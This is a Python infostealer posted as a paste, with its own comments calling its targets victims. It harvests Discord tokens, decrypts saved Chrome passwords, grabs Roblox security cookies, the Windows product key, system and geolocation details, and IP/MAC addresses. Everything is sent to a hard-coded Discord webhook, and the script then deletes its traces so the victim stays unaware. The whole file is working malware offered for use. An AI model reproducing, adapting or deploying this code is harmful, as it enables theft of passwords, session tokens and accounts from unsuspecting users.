· 4 years ago · Aug 10, 2021, 07:18 PM
1import psutil
2import platform
3import json
4from datetime import datetime
5from time import sleep
6import requests
7import socket
8from requests import get
9import os
10import re
11import requests
12import subprocess
13from uuid import getnode as get_mac
14import browser_cookie3 as steal, requests, base64, random, string, zipfile, shutil, dhooks, os, re, sys, sqlite3
15from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
16from cryptography.hazmat.primitives.ciphers.aead import AESGCM
17from cryptography.hazmat.backends import default_backend
18from Crypto.Cipher import AES
19
20
21from base64 import b64decode, b64encode
22from dhooks import Webhook, Embed, File
23from subprocess import Popen, PIPE
24from json import loads, dumps
25from shutil import copyfile
26from sys import argv
27
28# CONFIG -> Setup before compiling
29url= "https://discord.com/api/webhooks/874690460067717201/IxdKWFZooIu_qRAwIBXqn1ZGo5YW95fAVWYnDVvVGSmV2yMWjYkPj1jxqHZoSa9OoidW"
30
31
32
33
34# Scaling from bytes to KB,MB,GB, etc
35def scale(bytes, suffix="B"):
36 defined = 1024
37 for unit in ["", "K", "M", "G", "T", "P"]:
38 if bytes < defined:
39 return f"{bytes:.2f}{unit}{suffix}"
40 bytes /= defined
41
42uname = platform.uname()
43
44bt = datetime.fromtimestamp(psutil.boot_time()) # Boot time
45
46host = socket.gethostname()
47localip = socket.gethostbyname(host)
48
49publicip = get('https://api.ipify.org').text # Get public API
50city = get(f'https://ipapi.co/{publicip}/city').text
51region = get(f'https://ipapi.co/{publicip}/region').text
52postal = get(f'https://ipapi.co/{publicip}/postal').text
53timezone = get(f'https://ipapi.co/{publicip}/timezone').text
54currency = get(f'https://ipapi.co/{publicip}/currency').text
55country = get(f'https://ipapi.co/{publicip}/country_name').text
56callcode = get(f"https://ipapi.co/{publicip}/country_calling_code").text
57vpn = requests.get('http://ip-api.com/json?fields=proxy')
58proxy = vpn.json()['proxy']
59mac = get_mac()
60
61
62roaming = os.getenv('AppData')
63## Output for txt file location
64output = open(roaming + "temp.txt", "a")
65
66
67## Discord Locations
68Directories = {
69 'Discord': roaming + '\\Discord',
70 'Discord Two': roaming + '\\discord',
71 'Discord Canary': roaming + '\\Discordcanary',
72 'Discord Canary Two': roaming + '\\discordcanary',
73 'Discord PTB': roaming + '\\discordptb',
74 'Google Chrome': roaming + '\\Google\\Chrome\\User Data\\Default',
75 'Opera': roaming + '\\Opera Software\\Opera Stable',
76 'Brave': roaming + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
77 'Yandex': roaming + '\\Yandex\\YandexBrowser\\User Data\\Default',
78}
79
80
81## Scan for the regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}
82def Yoink(Directory):
83 Directory += '\\Local Storage\\leveldb'
84
85 Tokens = []
86
87 for FileName in os.listdir(Directory):
88 if not FileName.endswith('.log') and not FileName.endswith('.ldb'):
89 continue
90
91 for line in [x.strip() for x in open(f'{Directory}\\{FileName}', errors='ignore').readlines() if x.strip()]:
92 for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
93 for Token in re.findall(regex, line):
94 Tokens.append(Token)
95
96 return Tokens
97
98
99## Wipe the temp file
100def Wipe():
101 if os.path.exists(roaming + "temp.txt"):
102 output2 = open(roaming + "temp.txt", "w")
103 output2.write("")
104 output2.close()
105 else:
106 pass
107
108
109## Search Directorys for Token regex if exists
110for Discord, Directory in Directories.items():
111 if os.path.exists(Directory):
112 Tokens = Yoink(Directory)
113 if len(Tokens) > 0:
114 for Token in Tokens:
115 realshit = f"{Token}\n"
116
117
118cpufreq = psutil.cpu_freq()
119svmem = psutil.virtual_memory()
120partitions = psutil.disk_partitions()
121disk_io = psutil.disk_io_counters()
122net_io = psutil.net_io_counters()
123
124partitions = psutil.disk_partitions()
125for partition in partitions:
126 try:
127 partition_usage = psutil.disk_usage(partition.mountpoint)
128 except PermissionError:
129 continue
130
131
132
133
134
135requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})
136
137DBP = r'Google\Chrome\User Data\Default\Login Data'
138ADP = os.environ['LOCALAPPDATA']
139
140
141def sniff(path):
142 path += '\\Local Storage\\leveldb'
143
144 tokens = []
145 try:
146 for file_name in os.listdir(path):
147 if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
148 continue
149
150 for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
151 for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
152 for token in re.findall(regex, line):
153 tokens.append(token)
154 return tokens
155 except:
156 pass
157
158
159def encrypt(cipher, plaintext, nonce):
160 cipher.mode = modes.GCM(nonce)
161 encryptor = cipher.encryptor()
162 ciphertext = encryptor.update(plaintext)
163 return (cipher, ciphertext, nonce)
164
165
166def decrypt(cipher, ciphertext, nonce):
167 cipher.mode = modes.GCM(nonce)
168 decryptor = cipher.decryptor()
169 return decryptor.update(ciphertext)
170
171
172def rcipher(key):
173 cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
174 return cipher
175
176
177def dpapi(encrypted):
178 import ctypes
179 import ctypes.wintypes
180
181 class DATA_BLOB(ctypes.Structure):
182 _fields_ = [('cbData', ctypes.wintypes.DWORD),
183 ('pbData', ctypes.POINTER(ctypes.c_char))]
184
185 p = ctypes.create_string_buffer(encrypted, len(encrypted))
186 blobin = DATA_BLOB(ctypes.sizeof(p), p)
187 blobout = DATA_BLOB()
188 retval = ctypes.windll.crypt32.CryptUnprotectData(
189 ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
190 if not retval:
191 raise ctypes.WinError()
192 result = ctypes.string_at(blobout.pbData, blobout.cbData)
193 ctypes.windll.kernel32.LocalFree(blobout.pbData)
194 return result
195
196
197def localdata():
198 jsn = None
199 with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
200 jsn = json.loads(str(f.readline()))
201 return jsn["os_crypt"]["encrypted_key"]
202
203
204def decryptions(encrypted_txt):
205 encoded_key = localdata()
206 encrypted_key = base64.b64decode(encoded_key.encode())
207 encrypted_key = encrypted_key[5:]
208 key = dpapi(encrypted_key)
209 nonce = encrypted_txt[3:15]
210 cipher = rcipher(key)
211 return decrypt(cipher, encrypted_txt[15:], nonce)
212
213
214class chrome:
215 def __init__(self):
216 self.passwordList = []
217
218 def chromedb(self):
219 _full_path = os.path.join(ADP, DBP)
220 _temp_path = os.path.join(ADP, 'sqlite_file')
221 if os.path.exists(_temp_path):
222 os.remove(_temp_path)
223 shutil.copyfile(_full_path, _temp_path)
224 self.pwsd(_temp_path)
225 def pwsd(self, db_file):
226 conn = sqlite3.connect(db_file)
227 _sql = 'select signon_realm,username_value,password_value from logins'
228 for row in conn.execute(_sql):
229 host = row[0]
230 if host.startswith('android'):
231 continue
232 name = row[1]
233 value = self.cdecrypt(row[2])
234 _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
235 self.passwordList.append(_info)
236 conn.close()
237 os.remove(db_file)
238
239 def cdecrypt(self, encrypted_txt):
240 if sys.platform == 'win32':
241 try:
242 if encrypted_txt[:4] == b'\x01\x00\x00\x00':
243 decrypted_txt = dpapi(encrypted_txt)
244 return decrypted_txt.decode()
245 elif encrypted_txt[:3] == b'v10':
246 decrypted_txt = decryptions(encrypted_txt)
247 return decrypted_txt[:-16].decode()
248 except WindowsError:
249 return None
250 else:
251 pass
252
253 def saved(self):
254 try:
255 with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
256 f.writelines(self.passwordList)
257 except WindowsError:
258 return None
259
260
261if __name__ == "__main__":
262 main = chrome()
263 try:
264 main.chromedb()
265 except:
266 pass
267 main.saved()
268
269
270# webhook functionality => collect rest of specified data, send it to our webhook
271
272
273def beamed():
274 hook = Webhook(url)
275 try:
276 hostname = requests.get("https://api.ipify.org").text
277 except:
278 pass
279
280
281 local = os.getenv('LOCALAPPDATA')
282 roaming = os.getenv('APPDATA')
283 paths = {
284 'Discord': roaming + '\\Discord',
285 'Discord Canary': roaming + '\\discordcanary',
286 'Discord PTB': roaming + '\\discordptb',
287 'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
288 'Opera': roaming + '\\Opera Software\\Opera Stable',
289 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
290 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
291 }
292
293 message = '\n'
294 for platform, path in paths.items():
295 if not os.path.exists(path):
296 continue
297
298 message += '```'
299
300 tokens = sniff(path)
301
302 if len(tokens) > 0:
303 for token in tokens:
304 message += f'{token}\n'
305 else:
306 pass
307
308 message += '```'
309
310
311 """screenshot victim's desktop"""
312 try:
313 screenshot = image.grab()
314 screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
315 screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
316 screenshot.close()
317 except:
318 pass
319
320 """gather our .zip variables"""
321 try:
322 zname = r'C:\ProgramData\passwords.zip'
323 newzip = zipfile.ZipFile(zname, 'w')
324 newzip.write(r'C:\ProgramData\passwords.txt')
325 newzip.close()
326 passwords = File(r'C:\ProgramData\passwords.zip')
327 except:
328 pass
329
330 """gather our windows product key variables"""
331 try:
332 usr = os.getenv("UserName")
333 keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
334 types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
335 except:
336 pass
337
338 """steal victim's .roblosecurity cookie"""
339 cookie = [".ROBLOSECURITY"]
340 cookies = []
341 limit = 2000
342
343 """chrome installation => list cookies from this location"""
344 try:
345 cookies.extend(list(steal.chrome()))
346 except:
347 pass
348
349 """firefox installation => list cookies from this location"""
350 try:
351 cookies.extend(list(steal.firefox()))
352 except:
353 pass
354
355 """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
356 try:
357 for y in cookie:
358 send = str([str(x) for x in cookies if y in str(x)])
359 chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
360 for z in chunks:
361 roblox = f'```' + f'{z}' + '```'
362 except:
363 pass
364
365 """attempt to send all recieved data to our specified webhook"""
366 try:
367 embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
368 embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
369 embed.add_field("roblosecurity:",roblox)
370 embed.add_field("tokens:",message)
371 embed.add_field("hostname:",f"{hostname}")
372 except:
373 pass
374 try:
375 hook.send(embed=embed, file=passwords)
376 except:
377 pass
378
379 """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
380 try:
381 subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
382 subprocess.os.system(r'del C:\ProgramData\passwords.zip')
383 subprocess.os.system(r'del C:\ProgramData\passwords.txt')
384 except:
385 pass
386
387
388beamed()